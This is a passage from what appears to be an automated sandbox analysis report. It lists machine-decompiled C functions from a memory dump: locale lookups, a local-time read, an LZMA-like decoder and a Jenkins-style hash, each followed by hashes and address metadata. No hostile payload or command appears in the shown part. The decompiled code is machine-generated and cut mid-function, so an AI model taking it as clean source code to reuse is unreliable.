                                                            					return E00407E00(_t10, _t18);
                                                            				}
                                                            				return E00407BA8(_t10, _t5 - 1,  &_v516, _t19);
                                                            			}









                                                            APIs
                                                            • GetLocaleInfoW.KERNEL32(?,?,?,00000100), ref: 0041E052
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: InfoLocale
                                                            • String ID:
                                                            • API String ID: 2299586839-0
                                                            • Opcode ID: d1249f9bfb9152180de995f4510b089303b0330b3d36e5e1fa950d916a740853
                                                            • Instruction ID: c90943d4e22265a1f7ecf9aede9ac9faa011377f579ac525cbc4109061889d1c
                                                            • Opcode Fuzzy Hash: d1249f9bfb9152180de995f4510b089303b0330b3d36e5e1fa950d916a740853
                                                            • Instruction Fuzzy Hash: C7E09235B0421427E314A55A9C86AE7725D9B48340F40457FBD05D7382EDB9AE8042E9
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 79%
                                                            			E0041E080(int __eax, signed int __ecx, int __edx) {
                                                            				short _v16;
                                                            				signed int _t5;
                                                            				signed int _t10;
                                                            
                                                            				_push(__ecx);
                                                            				_t10 = __ecx;
                                                            				if(GetLocaleInfoW(__eax, __edx,  &_v16, 2) <= 0) {
                                                            					_t5 = _t10;
                                                            				} else {
                                                            					_t5 = _v16 & 0x0000ffff;
                                                            				}
                                                            				return _t5;
                                                            			}







                                                            APIs
                                                            • GetLocaleInfoW.KERNEL32(?,0000000F,?,00000002,0000002C,?,?,?,0041E182,?,00000001,00000000,0041E391), ref: 0041E093
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: InfoLocale
                                                            • String ID:
                                                            • API String ID: 2299586839-0
                                                            • Opcode ID: c2a2e253f202cad765f8f9b35123567cb33a3e9031303696ff7b3b42dc5ba059
                                                            • Instruction ID: 961adf842b5e4829a7f1cb68f4be235500f18d0b61d537998bbd462cca006134
                                                            • Opcode Fuzzy Hash: c2a2e253f202cad765f8f9b35123567cb33a3e9031303696ff7b3b42dc5ba059
                                                            • Instruction Fuzzy Hash: 45D05EBA31923476E214915B6E85DB75ADCCBC87A2F14483BBE4CC6241D2A4CC46A275
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E004AF218(signed int __eax) {
                                                            				short _v8;
                                                            				signed int _t6;
                                                            
                                                            				_t6 = GetLocaleInfoW(__eax & 0x0000ffff, 0x20001004,  &_v8, 2);
                                                            				if(_t6 <= 0) {
                                                            					return _t6 | 0xffffffff;
                                                            				}
                                                            				return _v8;
                                                            			}






                                                            APIs
                                                            • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,00000000,?,?,004AF318), ref: 004AF22E
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: InfoLocale
                                                            • String ID:
                                                            • API String ID: 2299586839-0
                                                            • Opcode ID: 91ef75d91c3bf0fbfb4c903f00eadddcc0e9dd42321a82c412adf8826a4a964a
                                                            • Instruction ID: 3cbbb47bc5e3852376f83ef88ad8e7e21f22c900a58d153b56eed97a123c5839
                                                            • Opcode Fuzzy Hash: 91ef75d91c3bf0fbfb4c903f00eadddcc0e9dd42321a82c412adf8826a4a964a
                                                            • Instruction Fuzzy Hash: E8D0A5F55442087DF504C1DA5D82FB673DCD705374F500767F654C52C1D567EE015219
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E0041C3D8() {
                                                            				struct _SYSTEMTIME* _t2;
                                                            
                                                            				GetLocalTime(_t2);
                                                            				return _t2->wYear & 0x0000ffff;
                                                            			}





                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: LocalTime
                                                            • String ID:
                                                            • API String ID: 481472006-0
                                                            • Opcode ID: 2bbd9f916a85fd19aaf3e135de3c6f6031220cebfdbc254b78c71648618a48a1
                                                            • Instruction ID: 79eafb11b28f80ce797d6e9fe134e5764476c7cb5db39d72cf417c4d7be8b418
                                                            • Opcode Fuzzy Hash: 2bbd9f916a85fd19aaf3e135de3c6f6031220cebfdbc254b78c71648618a48a1
                                                            • Instruction Fuzzy Hash: DAA0122080582011D140331A0C0313530405900620FC40F55BCF8542D1E93D013440D7
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E004255DC(intOrPtr* __eax, intOrPtr __ecx, intOrPtr __edx, intOrPtr* _a4, intOrPtr _a8) {
                                                            				intOrPtr* _v8;
                                                            				intOrPtr _v12;
                                                            				intOrPtr _v16;
                                                            				intOrPtr _v20;
                                                            				signed int _v24;
                                                            				char _v25;
                                                            				signed int _v32;
                                                            				signed int _v36;
                                                            				signed int _v40;
                                                            				signed int _v44;
                                                            				signed int _v48;
                                                            				signed int _v52;
                                                            				signed int _v56;
                                                            				intOrPtr _v60;
                                                            				char _v64;
                                                            				char* _v68;
                                                            				void* _v72;
                                                            				char _v76;
                                                            				intOrPtr _v80;
                                                            				intOrPtr _v84;
                                                            				signed int _v88;
                                                            				char _v89;
                                                            				char _v96;
                                                            				signed int _v100;
                                                            				signed int _v104;
                                                            				short* _v108;
                                                            				signed int _v112;
                                                            				signed int _v116;
                                                            				intOrPtr _v120;
                                                            				intOrPtr _v124;
                                                            				intOrPtr _v128;
                                                            				intOrPtr _v132;
                                                            				char _v136;
                                                            				signed int _t370;
                                                            				void* _t375;
                                                            				signed int _t377;
                                                            				signed int _t381;
                                                            				signed int _t389;
                                                            				signed int _t395;
                                                            				signed int _t411;
                                                            				intOrPtr _t422;
                                                            				signed int _t426;
                                                            				signed int _t435;
                                                            				void* _t448;
                                                            				signed int _t458;
                                                            				char _t460;
                                                            				signed int _t474;
                                                            				char* _t503;
                                                            				signed int _t508;
                                                            				signed int _t616;
                                                            				signed int _t617;
                                                            				signed int _t618;
                                                            				signed int _t622;
                                                            
                                                            				_v16 = __ecx;
                                                            				_v12 = __edx;
                                                            				_v8 = __eax;
                                                            				_v20 =  *((intOrPtr*)(_v8 + 0x10));
                                                            				_v24 = 0;
                                                            				_v32 = (1 <<  *(_v8 + 8)) - 1;
                                                            				_v36 = (1 <<  *(_v8 + 4)) - 1;
                                                            				_v40 =  *_v8;
                                                            				_t617 =  *((intOrPtr*)(_v8 + 0x34));
                                                            				_t474 =  *(_v8 + 0x44);
                                                            				_v44 =  *((intOrPtr*)(_v8 + 0x38));
                                                            				_v48 =  *((intOrPtr*)(_v8 + 0x3c));
                                                            				_v52 =  *((intOrPtr*)(_v8 + 0x40));
                                                            				_v56 =  *((intOrPtr*)(_v8 + 0x48));
                                                            				_v60 =  *((intOrPtr*)(_v8 + 0x2c));
                                                            				_v64 =  *((intOrPtr*)(_v8 + 0x30));
                                                            				_v68 =  *((intOrPtr*)(_v8 + 0x1c));
                                                            				_v72 =  *((intOrPtr*)(_v8 + 0xc));
                                                            				_t616 =  *((intOrPtr*)(_v8 + 0x28));
                                                            				_v128 =  *((intOrPtr*)(_v8 + 0x20));
                                                            				_v124 =  *((intOrPtr*)(_v8 + 0x24));
                                                            				_v120 = _v12;
                                                            				_v136 =  *((intOrPtr*)(_v8 + 0x14));
                                                            				_v132 =  *((intOrPtr*)(_v8 + 0x18));
                                                            				 *_a4 = 0;
                                                            				if(_v56 == 0xffffffff) {
                                                            					return 0;
                                                            				}
                                                            				__eflags = _v72;
                                                            				if(_v72 == 0) {
                                                            					_v68 =  &_v76;
                                                            					_v72 = 1;
                                                            					_v76 =  *((intOrPtr*)(_v8 + 0x4c));
                                                            				}
                                                            				__eflags = _v56 - 0xfffffffe;
                                                            				if(_v56 != 0xfffffffe) {
                                                            					L12:
                                                            					_v108 = _v16 + _v24;
                                                            					while(1) {
                                                            						__eflags = _v56;
                                                            						if(_v56 == 0) {
                                                            							break;
                                                            						}
                                                            						__eflags = _v24 - _a8;
                                                            						if(_v24 < _a8) {
                                                            							_t458 = _t616 - _t617;
                                                            							__eflags = _t458 - _v72;
                                                            							if(_t458 >= _v72) {
                                                            								_t458 = _t458 + _v72;
                                                            								__eflags = _t458;
                                                            							}
                                                            							_t460 =  *((intOrPtr*)(_v68 + _t458));
                                                            							 *((char*)(_v68 + _t616)) = _t460;
                                                            							 *_v108 = _t460;
                                                            							_v24 = _v24 + 1;
                                                            							_v108 = _v108 + 1;
                                                            							_t616 = _t616 + 1;
                                                            							__eflags = _t616 - _v72;
                                                            							if(_t616 == _v72) {
                                                            								_t616 = 0;
                                                            								__eflags = 0;
                                                            							}
                                                            							_t116 =  &_v56;
                                                            							 *_t116 = _v56 - 1;
                                                            							__eflags =  *_t116;
                                                            							continue;
                                                            						}
                                                            						break;
                                                            					}
                                                            					__eflags = _t616;
                                                            					if(_t616 != 0) {
                                                            						_v25 =  *((intOrPtr*)(_v68 + _t616 - 1));
                                                            					} else {
                                                            						_v25 =  *((intOrPtr*)(_v68 + _v72 - 1));
                                                            					}
                                                            					__eflags = 0;
                                                            					_v116 = 0;
                                                            					_v112 = 0;
                                                            					while(1) {
                                                            						L24:
                                                            						_v108 = _v16 + _v24;
                                                            						__eflags = _v24 - _a8;
                                                            						if(_v24 >= _a8) {
                                                            							break;
                                                            						} else {
                                                            							goto L25;
                                                            						}
                                                            						while(1) {
                                                            							L25:
                                                            							_v88 = _v24 + _v60 & _v32;
                                                            							__eflags = _v116;
                                                            							if(_v116 != 0) {
                                                            								break;
                                                            							}
                                                            							__eflags = _v112;
                                                            							if(_v112 == 0) {
                                                            								_t370 = E00425334((_t474 << 4) + (_t474 << 4) + _v20 + _v88 + _v88,  &_v136);
                                                            								__eflags = _t370;
                                                            								if(_t370 != 0) {
                                                            									_t375 = E00425334(_t474 + _t474 + _v20 + 0x180,  &_v136);
                                                            									__eflags = _t375 != 1;
                                                            									if(_t375 != 1) {
                                                            										_v52 = _v48;
                                                            										_v48 = _v44;
                                                            										_v44 = _t617;
                                                            										__eflags = _t474 - 7;
                                                            										if(__eflags >= 0) {
                                                            											_t377 = 0xa;
                                                            										} else {
                                                            											_t377 = 7;
                                                            										}
                                                            										_t474 = _t377;
                                                            										_v56 = E004254E4(_v20 + 0x664, _v88,  &_v136, __eflags);
                                                            										_t503 =  &_v136;
                                                            										__eflags = _v56 - 4;
                                                            										if(_v56 >= 4) {
                                                            											_t381 = 3;
                                                            										} else {
                                                            											_t381 = _v56;
                                                            										}
                                                            										_v100 = E004253BC((_t381 << 6) + (_t381 << 6) + _v20 + 0x360, _t503, 6);
                                                            										__eflags = _v100 - 4;
                                                            										if(_v100 < 4) {
                                                            											_t618 = _v100;
                                                            										} else {
                                                            											_v104 = (_v100 >> 1) - 1;
                                                            											_t524 = _v104;
                                                            											_t622 = (_v100 & 0x00000001 | 0x00000002) << _v104;
                                                            											__eflags = _v100 - 0xe;
                                                            											if(_v100 >= 0xe) {
                                                            												_t395 = E004252D4( &_v136, _t524, _v104 + 0xfffffffc);
                                                            												_t618 = _t622 + (_t395 << 4) + E00425400(_v20 + 0x644,  &_v136, 4);
                                                            											} else {
                                                            												_t618 = _t622 + E00425400(_t622 + _t622 + _v20 + 0x560 - _v100 + _v100 + 0xfffffffe,  &_v136, _v104);
                                                            											}
                                                            										}
                                                            										_t617 = _t618 + 1;
                                                            										__eflags = _t617;
                                                            										if(_t617 != 0) {
                                                            											L82:
                                                            											_v56 = _v56 + 2;
                                                            											__eflags = _t617 - _v64;
                                                            											if(_t617 <= _v64) {
                                                            												__eflags = _v72 - _v64 - _v56;
                                                            												if(_v72 - _v64 <= _v56) {
                                                            													_v64 = _v72;
                                                            												} else {
                                                            													_v64 = _v64 + _v56;
                                                            												}
                                                            												while(1) {
                                                            													_t389 = _t616 - _t617;
                                                            													__eflags = _t389 - _v72;
                                                            													if(_t389 >= _v72) {
                                                            														_t389 = _t389 + _v72;
                                                            														__eflags = _t389;
                                                            													}
                                                            													_v25 =  *((intOrPtr*)(_v68 + _t389));
                                                            													 *((char*)(_v68 + _t616)) = _v25;
                                                            													_t616 = _t616 + 1;
                                                            													__eflags = _t616 - _v72;
                                                            													if(_t616 == _v72) {
                                                            														_t616 = 0;
                                                            														__eflags = 0;
                                                            													}
                                                            													_v56 = _v56 - 1;
                                                            													 *_v108 = _v25;
                                                            													_v24 = _v24 + 1;
                                                            													_v108 = _v108 + 1;
                                                            													__eflags = _v56;
                                                            													if(_v56 == 0) {
                                                            														break;
                                                            													}
                                                            													__eflags = _v24 - _a8;
                                                            													if(_v24 < _a8) {
                                                            														continue;
                                                            													}
                                                            													break;
                                                            												}
                                                            												L93:
                                                            												__eflags = _v24 - _a8;
                                                            												if(_v24 < _a8) {
                                                            													continue;
                                                            												}
                                                            												goto L94;
                                                            											}
                                                            											return 1;
                                                            										} else {
                                                            											_v56 = 0xffffffff;
                                                            											goto L94;
                                                            										}
                                                            									}
                                                            									_t411 = E00425334(_t474 + _t474 + _v20 + 0x198,  &_v136);
                                                            									__eflags = _t411;
                                                            									if(_t411 != 0) {
                                                            										__eflags = E00425334(_t474 + _t474 + _v20 + 0x1b0,  &_v136);
                                                            										if(__eflags != 0) {
                                                            											__eflags = E00425334(_t474 + _t474 + _v20 + 0x1c8,  &_v136);
                                                            											if(__eflags != 0) {
                                                            												_t422 = _v52;
                                                            												_v52 = _v48;
                                                            											} else {
                                                            												_t422 = _v48;
                                                            											}
                                                            											_v48 = _v44;
                                                            										} else {
                                                            											_t422 = _v44;
                                                            										}
                                                            										_v44 = _t617;
                                                            										_t617 = _t422;
                                                            										L65:
                                                            										_v56 = E004254E4(_v20 + 0xa68, _v88,  &_v136, __eflags);
                                                            										__eflags = _t474 - 7;
                                                            										if(_t474 >= 7) {
                                                            											_t426 = 0xb;
                                                            										} else {
                                                            											_t426 = 8;
                                                            										}
                                                            										_t474 = _t426;
                                                            										goto L82;
                                                            									}
                                                            									__eflags = E00425334((_t474 << 4) + (_t474 << 4) + _v20 + _v88 + _v88 + 0x1e0,  &_v136);
                                                            									if(__eflags != 0) {
                                                            										goto L65;
                                                            									}
                                                            									__eflags = _v64;
                                                            									if(_v64 != 0) {
                                                            										__eflags = _t474 - 7;
                                                            										if(_t474 >= 7) {
                                                            											_t508 = 0xb;
                                                            										} else {
                                                            											_t508 = 9;
                                                            										}
                                                            										_t474 = _t508;
                                                            										_t435 = _t616 - _t617;
                                                            										__eflags = _t435 - _v72;
                                                            										if(_t435 >= _v72) {
                                                            											_t435 = _t435 + _v72;
                                                            											__eflags = _t435;
                                                            										}
                                                            										_v25 =  *((intOrPtr*)(_v68 + _t435));
                                                            										 *((char*)(_v68 + _t616)) = _v25;
                                                            										_t616 = _t616 + 1;
                                                            										__eflags = _t616 - _v72;
                                                            										if(_t616 == _v72) {
                                                            											_t616 = 0;
                                                            											__eflags = 0;
                                                            										}
                                                            										 *_v108 = _v25;
                                                            										_v24 = _v24 + 1;
                                                            										__eflags = _v64 - _v72;
                                                            										if(_v64 < _v72) {
                                                            											_v64 = _v64 + 1;
                                                            										}
                                                            										goto L24;
                                                            									}
                                                            									return 1;
                                                            								}
                                                            								_t448 = (((_v24 + _v60 & _v36) << _v40) + (0 >> 8 - _v40) << 8) + (((_v24 + _v60 & _v36) << _v40) + (0 >> 8 - _v40) << 8) * 2 + (((_v24 + _v60 & _v36) << _v40) + (0 >> 8 - _v40) << 8) + (((_v24 + _v60 & _v36) << _v40) + (0 >> 8 - _v40) << 8) * 2 + _v20 + 0xe6c;
                                                            								__eflags = _t474 - 7;
                                                            								if(__eflags < 0) {
                                                            									_v25 = E00425444(_t448,  &_v136, __eflags);
                                                            								} else {
                                                            									_v96 = _t616 - _t617;
                                                            									__eflags = _v96 - _v72;
                                                            									if(__eflags >= 0) {
                                                            										_t161 =  &_v96;
                                                            										 *_t161 = _v96 + _v72;
                                                            										__eflags =  *_t161;
                                                            									}
                                                            									_v89 =  *((intOrPtr*)(_v68 + _v96));
                                                            									_v25 = E00425470(_t448, _v89,  &_v136, __eflags);
                                                            								}
                                                            								 *_v108 = _v25;
                                                            								_v24 = _v24 + 1;
                                                            								_v108 = _v108 + 1;
                                                            								__eflags = _v64 - _v72;
                                                            								if(_v64 < _v72) {
                                                            									_t180 =  &_v64;
                                                            									 *_t180 = _v64 + 1;
                                                            									__eflags =  *_t180;
                                                            								}
                                                            								 *((char*)(_v68 + _t616)) = _v25;
                                                            								_t616 = _t616 + 1;
                                                            								__eflags = _t616 - _v72;
                                                            								if(_t616 == _v72) {
                                                            									_t616 = 0;
                                                            									__eflags = 0;
                                                            								}
                                                            								__eflags = _t474 - 4;
                                                            								if(_t474 >= 4) {
                                                            									__eflags = _t474 - 0xa;
                                                            									if(_t474 >= 0xa) {
                                                            										_t474 = _t474 - 6;
                                                            									} else {
                                                            										_t474 = _t474 - 3;
                                                            									}
                                                            								} else {
                                                            									_t474 = 0;
                                                            								}
                                                            								goto L93;
                                                            							}
                                                            							return 1;
                                                            						}
                                                            						return _v116;
                                                            					}
                                                            					L94:
                                                            					 *((intOrPtr*)(_v8 + 0x20)) = _v128;
                                                            					 *((intOrPtr*)(_v8 + 0x24)) = _v124;
                                                            					 *((intOrPtr*)(_v8 + 0x28)) = _t616;
                                                            					 *((intOrPtr*)(_v8 + 0x2c)) = _v60 + _v24;
                                                            					 *((intOrPtr*)(_v8 + 0x30)) = _v64;
                                                            					 *((intOrPtr*)(_v8 + 0x34)) = _t617;
                                                            					 *((intOrPtr*)(_v8 + 0x38)) = _v44;
                                                            					 *((intOrPtr*)(_v8 + 0x3c)) = _v48;
                                                            					 *((intOrPtr*)(_v8 + 0x40)) = _v52;
                                                            					 *(_v8 + 0x44) = _t474;
                                                            					 *((intOrPtr*)(_v8 + 0x48)) = _v56;
                                                            					 *((char*)(_v8 + 0x4c)) = _v76;
                                                            					 *((intOrPtr*)(_v8 + 0x14)) = _v136;
                                                            					 *((intOrPtr*)(_v8 + 0x18)) = _v132;
                                                            					 *_a4 = _v24;
                                                            					__eflags = 0;
                                                            					return 0;
                                                            				}
                                                            				_v80 = (0x300 <<  *(_v8 + 4) + _v40) + 0x736;
                                                            				_v84 = 0;
                                                            				_v108 = _v20;
                                                            				__eflags = _v84 - _v80;
                                                            				if(_v84 >= _v80) {
                                                            					L7:
                                                            					_v52 = 1;
                                                            					_v48 = 1;
                                                            					_v44 = 1;
                                                            					_t617 = 1;
                                                            					_v60 = 0;
                                                            					_v64 = 0;
                                                            					_t474 = 0;
                                                            					_t616 = 0;
                                                            					 *((char*)(_v68 + _v72 - 1)) = 0;
                                                            					E00425294( &_v136);
                                                            					__eflags = _v116;
                                                            					if(_v116 != 0) {
                                                            						return _v116;
                                                            					}
                                                            					__eflags = _v112;
                                                            					if(_v112 == 0) {
                                                            						__eflags = 0;
                                                            						_v56 = 0;
                                                            						goto L12;
                                                            					} else {
                                                            						return 1;
                                                            					}
                                                            				} else {
                                                            					goto L6;
                                                            				}
                                                            				do {
                                                            					L6:
                                                            					 *_v108 = 0x400;
                                                            					_v84 = _v84 + 1;
                                                            					_v108 = _v108 + 2;
                                                            					__eflags = _v84 - _v80;
                                                            				} while (_v84 < _v80);
                                                            				goto L7;
                                                            			}
                                                            0x0042599a
                                                            0x0042599a
                                                            0x0042599a
                                                            0x004259a6
                                                            0x004259aa
                                                            0x004259ac
                                                            0x004259af
                                                            0x004259b1
                                                            0x004259b1
                                                            0x004259b1
                                                            0x004259ba
                                                            0x004259c3
                                                            0x004259c6
                                                            0x004259c7
                                                            0x004259ca
                                                            0x004259cc
                                                            0x004259cc
                                                            0x004259cc
                                                            0x004259d4
                                                            0x004259d6
                                                            0x004259dc
                                                            0x004259df
                                                            0x004259e5
                                                            0x004259e5
                                                            0x00000000
                                                            0x004259df
                                                            0x00000000
                                                            0x0042598b
                                                            0x00425888
                                                            0x0042588d
                                                            0x00425890
                                                            0x004258d1
                                                            0x00425892
                                                            0x00425896
                                                            0x0042589c
                                                            0x0042589f
                                                            0x004258a4
                                                            0x004258a4
                                                            0x004258a4
                                                            0x004258a4
                                                            0x004258b0
                                                            0x004258c1
                                                            0x004258c1
                                                            0x004258da
                                                            0x004258dc
                                                            0x004258df
                                                            0x004258e5
                                                            0x004258e8
                                                            0x004258ea
                                                            0x004258ea
                                                            0x004258ea
                                                            0x004258ea
                                                            0x004258f3
                                                            0x004258f6
                                                            0x004258f7
                                                            0x004258fa
                                                            0x004258fc
                                                            0x004258fc
                                                            0x004258fc
                                                            0x004258fe
                                                            0x00425901
                                                            0x0042590a
                                                            0x0042590d
                                                            0x00425917
                                                            0x0042590f
                                                            0x0042590f
                                                            0x0042590f
                                                            0x00425903
                                                            0x00425903
                                                            0x00425903
                                                            0x00000000
                                                            0x00425901
                                                            0x00000000
                                                            0x00425830
                                                            0x00000000
                                                            0x00425822
                                                            0x00425be8
                                                            0x00425bee
                                                            0x00425bf7
                                                            0x00425bfd
                                                            0x00425c09
                                                            0x00425c12
                                                            0x00425c18
                                                            0x00425c21
                                                            0x00425c2a
                                                            0x00425c33
                                                            0x00425c39
                                                            0x00425c42
                                                            0x00425c4b
                                                            0x00425c57
                                                            0x00425c60
                                                            0x00425c69
                                                            0x00425c6b
                                                            0x00000000
                                                            0x00425c6b
                                                            0x00425701
                                                            0x00425704
                                                            0x0042570c
                                                            0x00425712
                                                            0x00425715
                                                            0x0042572e
                                                            0x00425735
                                                            0x00425738
                                                            0x0042573b
                                                            0x0042573e
                                                            0x00425740
                                                            0x00425745
                                                            0x00425748
                                                            0x00425750
                                                            0x00425752
                                                            0x0042575d
                                                            0x00425762
                                                            0x00425766
                                                            0x00000000
                                                            0x00425768
                                                            0x00425770
                                                            0x00425774
                                                            0x00425780
                                                            0x00425782
                                                            0x00000000
                                                            0x00425776
                                                            0x00000000
                                                            0x00425776
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00425717
                                                            0x00425717
                                                            0x0042571a
                                                            0x0042571f
                                                            0x00425722
                                                            0x00425729
                                                            0x00425729
                                                            0x00000000

                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7cb438cf7f0ff76753a1d16800e3023f3e313fbbfbb21f985cf38b771b24bb28
                                                            • Instruction ID: 61b87226b6134f121ca287378b5d435c32ef56f555bf4f4916e7d2b2d6d49e77
                                                            • Opcode Fuzzy Hash: 7cb438cf7f0ff76753a1d16800e3023f3e313fbbfbb21f985cf38b771b24bb28
                                                            • Instruction Fuzzy Hash: E932E274E00629DFCB14CF99D981AEDBBB2BF88314F64816AD815AB341D734AE42CF54
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E004323DC(signed int* __eax, intOrPtr __ecx, signed int __edx) {
                                                            				signed int* _v8;
                                                            				signed int* _v12;
                                                            				intOrPtr _v16;
                                                            				char _v20;
                                                            				char _v24;
                                                            				char _v28;
                                                            				unsigned int* _t96;
                                                            				unsigned int* _t106;
                                                            				signed int* _t108;
                                                            				signed int _t109;
                                                            
                                                            				_t109 = __edx;
                                                            				_v16 = __ecx;
                                                            				_v12 = __eax;
                                                            				_t106 =  &_v24;
                                                            				_t108 =  &_v28;
                                                            				_t96 =  &_v20;
                                                            				 *_t96 = __edx + 0xdeadbeef + _v16;
                                                            				 *_t106 =  *_t96;
                                                            				 *_t108 =  *_t96;
                                                            				_v8 = _v12;
                                                            				if((_v8 & 0x00000003) != 0) {
                                                            					if(__edx <= 0xc) {
                                                            						L20:
                                                            						if(_t109 > 0xc) {
                                                            							L23:
                                                            							 *_t108 =  *_t108 + ((_v8[2] & 0x000000ff) << 0x18);
                                                            							L24:
                                                            							 *_t108 =  *_t108 + ((_v8[2] & 0x000000ff) << 0x10);
                                                            							L25:
                                                            							 *_t108 =  *_t108 + ((_v8[2] & 0x000000ff) << 8);
                                                            							L26:
                                                            							 *_t108 =  *_t108 + (_v8[2] & 0x000000ff);
                                                            							L27:
                                                            							 *_t106 =  *_t106 + ((_v8[1] & 0x000000ff) << 0x18);
                                                            							L28:
                                                            							 *_t106 =  *_t106 + ((_v8[1] & 0x000000ff) << 0x10);
                                                            							L29:
                                                            							 *_t106 =  *_t106 + ((_v8[1] & 0x000000ff) << 8);
                                                            							L30:
                                                            							 *_t106 =  *_t106 + (_v8[1] & 0x000000ff);
                                                            							L31:
                                                            							 *_t96 =  *_t96 + ((_v8[0] & 0x000000ff) << 0x18);
                                                            							L32:
                                                            							 *_t96 =  *_t96 + ((_v8[0] & 0x000000ff) << 0x10);
                                                            							L33:
                                                            							 *_t96 =  *_t96 + ((_v8[0] & 0x000000ff) << 8);
                                                            							L34:
                                                            							 *_t96 =  *_t96 + ( *_v8 & 0x000000ff);
                                                            							L35:
                                                            							 *_t108 =  *_t108 ^  *_t106;
                                                            							 *_t108 =  *_t108 - ( *_t106 << 0x0000000e |  *_t106 >> 0x00000012);
                                                            							 *_t96 =  *_t96 ^  *_t108;
                                                            							 *_t96 =  *_t96 - ( *_t108 << 0x0000000b |  *_t108 >> 0x00000015);
                                                            							 *_t106 =  *_t106 ^  *_t96;
                                                            							 *_t106 =  *_t106 - ( *_t96 << 0x00000019 |  *_t96 >> 0x00000007);
                                                            							 *_t108 =  *_t108 ^  *_t106;
                                                            							 *_t108 =  *_t108 - ( *_t106 << 0x00000010 |  *_t106 >> 0x00000010);
                                                            							 *_t96 =  *_t96 ^  *_t108;
                                                            							 *_t96 =  *_t96 - ( *_t108 << 0x00000004 |  *_t108 >> 0x0000001c);
                                                            							 *_t106 =  *_t106 ^  *_t96;
                                                            							 *_t106 =  *_t106 - ( *_t96 << 0x0000000e |  *_t96 >> 0x00000012);
                                                            							 *_t108 =  *_t108 ^  *_t106;
                                                            							 *_t108 =  *_t108 - ( *_t106 << 0x00000018 |  *_t106 >> 0x00000008);
                                                            							return  *_t108;
                                                            						}
                                                            						switch( *((intOrPtr*)(_t109 * 4 +  &M00432749))) {
                                                            							case 0:
                                                            								return  *_t108;
                                                            							case 1:
                                                            								goto L34;
                                                            							case 2:
                                                            								goto L33;
                                                            							case 3:
                                                            								goto L32;
                                                            							case 4:
                                                            								goto L31;
                                                            							case 5:
                                                            								goto L30;
                                                            							case 6:
                                                            								goto L29;
                                                            							case 7:
                                                            								goto L28;
                                                            							case 8:
                                                            								goto L27;
                                                            							case 9:
                                                            								goto L26;
                                                            							case 0xa:
                                                            								goto L25;
                                                            							case 0xb:
                                                            								goto L24;
                                                            							case 0xc:
                                                            								goto L23;
                                                            						}
                                                            					} else {
                                                            						goto L19;
                                                            					}
                                                            					do {
                                                            						L19:
                                                            						 *_t96 =  *_t96 + ( *_v8 & 0x000000ff) + ((_v8[0] & 0x000000ff) << 8) + ((_v8[0] & 0x000000ff) << 0x10) + ((_v8[0] & 0x000000ff) << 0x18);
                                                            						 *_t106 =  *_t106 + (_v8[1] & 0x000000ff) + ((_v8[1] & 0x000000ff) << 8) + ((_v8[1] & 0x000000ff) << 0x10) + ((_v8[1] & 0x000000ff) << 0x18);
